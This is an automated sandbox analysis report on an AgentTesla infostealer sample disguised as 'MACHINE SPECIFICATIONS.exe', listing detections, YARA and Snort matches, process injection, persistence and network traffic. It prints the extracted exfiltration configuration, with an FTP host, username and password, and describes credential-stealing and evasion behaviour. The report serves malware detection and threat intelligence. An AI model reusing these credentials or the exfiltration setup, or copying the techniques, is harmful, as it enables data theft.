Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MACHINE SPECIFICATIONS.exe

Overview

General Information

Sample Name:MACHINE SPECIFICATIONS.exe
Analysis ID:755960
MD5:92945d0a2731ef771ea9d10c792e03e1
SHA1:1eeef600b7b51ce7aa93e825be55b40f3ef8e319
SHA256:46b61250c34b38d26ac5897217e6b70a222ff16318161c4e67c74c74491cc612
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
.NET source code references suspicious native API functions
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Creates a window with clipboard capturing capabilities
Uses FTP
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • MACHINE SPECIFICATIONS.exe (PID: 6128 cmdline: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe MD5: 92945D0A2731EF771EA9D10C792E03E1)
    • CasPol.exe (PID: 688 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • newapp.exe (PID: 4272 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: F866FC1C2E928779C7119353C3091F0C)
    • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • newapp.exe (PID: 676 cmdline: "C:\Users\user\AppData\Roaming\newapp\newapp.exe" MD5: F866FC1C2E928779C7119353C3091F0C)
    • conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.electrobist.com", "Username": "user1@electrobist.com", "Password": "w&oNc9e]pf~4"}
SourceRuleDescriptionAuthorStrings
0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x31fc8:$a13: get_DnsResolver
      • 0x306b2:$a20: get_LastAccessed
      • 0x329f6:$a27: set_InternalServerPort
      • 0x32d2b:$a30: set_GuidMasterKey
      • 0x307c4:$a33: get_Clipboard
      • 0x307d2:$a34: get_Keyboard
      • 0x31bae:$a35: get_ShiftKeyDown
      • 0x31bbf:$a36: get_AltKeyDown
      • 0x307df:$a37: get_Password
      • 0x31303:$a38: get_PasswordHash
      • 0x3242a:$a39: get_DefaultCredentials
      0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Click to see the 4 entries
          SourceRuleDescriptionAuthorStrings
          10.0.CasPol.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            10.0.CasPol.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              10.0.CasPol.exe.400000.0.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x34d04:$s10: logins
              • 0x3477e:$s11: credential
              • 0x309c4:$g1: get_Clipboard
              • 0x309d2:$g2: get_Keyboard
              • 0x309df:$g3: get_Password
              • 0x31d9e:$g4: get_CtrlKeyDown
              • 0x31dae:$g5: get_ShiftKeyDown
              • 0x31dbf:$g6: get_AltKeyDown
              10.0.CasPol.exe.400000.0.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x321c8:$a13: get_DnsResolver
              • 0x308b2:$a20: get_LastAccessed
              • 0x32bf6:$a27: set_InternalServerPort
              • 0x32f2b:$a30: set_GuidMasterKey
              • 0x309c4:$a33: get_Clipboard
              • 0x309d2:$a34: get_Keyboard
              • 0x31dae:$a35: get_ShiftKeyDown
              • 0x31dbf:$a36: get_AltKeyDown
              • 0x309df:$a37: get_Password
              • 0x31503:$a38: get_PasswordHash
              • 0x3262a:$a39: get_DefaultCredentials
              No Sigma rule has matched
              Timestamp:192.168.2.351.195.62.16049702212029927 11/29/22-11:20:12.397759
              SID:2029927
              Source Port:49702
              Destination Port:21
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.351.195.62.16049703522592851779 11/29/22-11:20:12.420526
              SID:2851779
              Source Port:49703
              Destination Port:52259
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: MACHINE SPECIFICATIONS.exeVirustotal: Detection: 58%Perma Link
              Source: MACHINE SPECIFICATIONS.exeReversingLabs: Detection: 73%
              Source: http://ftp.electrobist.comAvira URL Cloud: Label: malware
              Source: MACHINE SPECIFICATIONS.exeJoe Sandbox ML: detected
              Source: 10.0.CasPol.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
              Source: 10.0.CasPol.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://ftp.electrobist.com", "Username": "user1@electrobist.com", "Password": "w&oNc9e]pf~4"}
              Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.3:49701 version: TLS 1.2
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: caspol.pdbdv source: CasPol.exe, 0000000A.00000003.399059752.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000000.387084223.0000000000802000.00000002.00000001.01000000.00000007.sdmp, newapp.exe.10.dr
              Source: Binary string: caspol.pdb source: CasPol.exe, 0000000A.00000003.399059752.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000000.387084223.0000000000802000.00000002.00000001.01000000.00000007.sdmp, newapp.exe.10.dr
              Source: Binary string: C:\Users\Memm\Downloads\JesusIsTheLord\obj\Debug\Meme.pdb source: MACHINE SPECIFICATIONS.exe

              Networking

              barindex
              Source: TrafficSnort IDS: 2029927 ET TROJAN AgentTesla Exfil via FTP 192.168.2.3:49702 -> 51.195.62.160:21
              Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.3:49703 -> 51.195.62.160:52259
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
              Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewIP Address: 51.195.62.160 51.195.62.160
              Source: Joe Sandbox ViewIP Address: 3.220.57.224 3.220.57.224
              Source: Joe Sandbox ViewIP Address: 3.220.57.224 3.220.57.224
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
              Source: global trafficTCP traffic: 192.168.2.3:49703 -> 51.195.62.160:52259
              Source: unknownFTP traffic detected: 51.195.62.160:21 -> 192.168.2.3:49702 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 15:20. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
              Source: CasPol.exe, 0000000A.00000003.409423403.000000000592A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.779812564.000000000592A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000003.399211019.000000000590A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: CasPol.exe, 0000000A.00000002.772635350.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.772655142.0000000002B6A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.electrobist.com
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xgrPBN.com
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgftp://ftp.electrobist.comuser1
              Source: CasPol.exe, 0000000A.00000002.768390327.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.772635350.0000000002B66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eyUBHCqVhczCNfHAY6U.org
              Source: CasPol.exe, 0000000A.00000002.767841057.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
              Source: unknownDNS traffic detected: queries for: api.ipify.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Host: api.ipify.orgConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 3.220.57.224:443 -> 192.168.2.3:49701 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

              System Summary

              barindex
              Source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
              Source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
              Source: 10.0.CasPol.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b209BAEF0u002dB9D1u002d4EDCu002d916Au002d070C59DE070Au007d/E2113872u002d1804u002d41A9u002d8E9Fu002d0420E9801409.csLarge array initialization: .cctor: array initializer size 11016
              Source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
              Source: 10.0.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: 0000000A.00000000.345984518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: Process Memory Space: CasPol.exe PID: 688, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_023FFC4810_2_023FFC48
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_023F6D2010_2_023F6D20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DF970810_2_05DF9708
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DFF2A010_2_05DFF2A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DFBE5010_2_05DFBE50
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DFB4E010_2_05DFB4E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DF84B810_2_05DF84B8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DF840810_2_05DF8408
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DFD9A810_2_05DFD9A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E9048010_2_05E90480
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E9217010_2_05E92170
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E9BC4010_2_05E9BC40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E95F4010_2_05E95F40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E929C810_2_05E929C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E9202010_2_05E92020
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E9CA6810_2_05E9CA68
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE3D4C10_2_05EE3D4C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE372C10_2_05EE372C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE566810_2_05EE5668
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EEC1E010_2_05EEC1E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE004010_2_05EE0040
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EEC05410_2_05EEC054
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE33E410_2_05EE33E4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EED3A010_2_05EED3A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE8B2810_2_05EE8B28
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05EE373010_2_05EE3730
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E9395810_2_05E93958
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_0113095811_2_01130958
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 13_2_00C0095813_2_00C00958
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: No import functions for PE file found
              Source: MACHINE SPECIFICATIONS.exeBinary or memory string: OriginalFilenameMeme.exe4 vs MACHINE SPECIFICATIONS.exe
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\newapp\newapp.exe 67F3FC243C58EEAE55BDDC22CE025B7841A89ACA2E201B999D8C0E4F07D177B8
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: MACHINE SPECIFICATIONS.exeVirustotal: Detection: 58%
              Source: MACHINE SPECIFICATIONS.exeReversingLabs: Detection: 73%
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\newapp\newapp.exe "C:\Users\user\AppData\Roaming\newapp\newapp.exe"
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MACHINE SPECIFICATIONS.exe.logJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA418.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@3/3
              Source: newapp.exe.10.dr, Microsoft.Tools.Caspol/caspol.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
              Source: newapp.exe.10.dr, Microsoft.Tools.Caspol/caspol.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 11.0.newapp.exe.800000.0.unpack, Microsoft.Tools.Caspol/caspol.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
              Source: 11.0.newapp.exe.800000.0.unpack, Microsoft.Tools.Caspol/caspol.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6132:120:WilError_01
              Source: MACHINE SPECIFICATIONS.exe, C6ean/Ough6.csCryptographic APIs: 'CreateDecryptor'
              Source: 10.0.CasPol.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: 10.0.CasPol.exe.400000.0.unpack, A/f2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: MACHINE SPECIFICATIONS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: caspol.pdbdv source: CasPol.exe, 0000000A.00000003.399059752.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000000.387084223.0000000000802000.00000002.00000001.01000000.00000007.sdmp, newapp.exe.10.dr
              Source: Binary string: caspol.pdb source: CasPol.exe, 0000000A.00000003.399059752.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, newapp.exe, 0000000B.00000000.387084223.0000000000802000.00000002.00000001.01000000.00000007.sdmp, newapp.exe.10.dr
              Source: Binary string: C:\Users\Memm\Downloads\JesusIsTheLord\obj\Debug\Meme.pdb source: MACHINE SPECIFICATIONS.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DFE6F9 pushfd ; ret 10_2_05DFE705
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DF9C29 push 550241CFh; iretd 10_2_05DF9C85
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05DF2A47 push edi; retn 0000h10_2_05DF2A49
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E9517B push esp; ret 10_2_05E951D5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_05E9517B pushad ; ret 10_2_05E95225
              Source: initial sampleStatic PE information: section name: .text entropy: 7.996815914318105
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile created: C:\Users\user\AppData\Roaming\newapp\newapp.exeJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run newappJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run newappJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (67).png
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
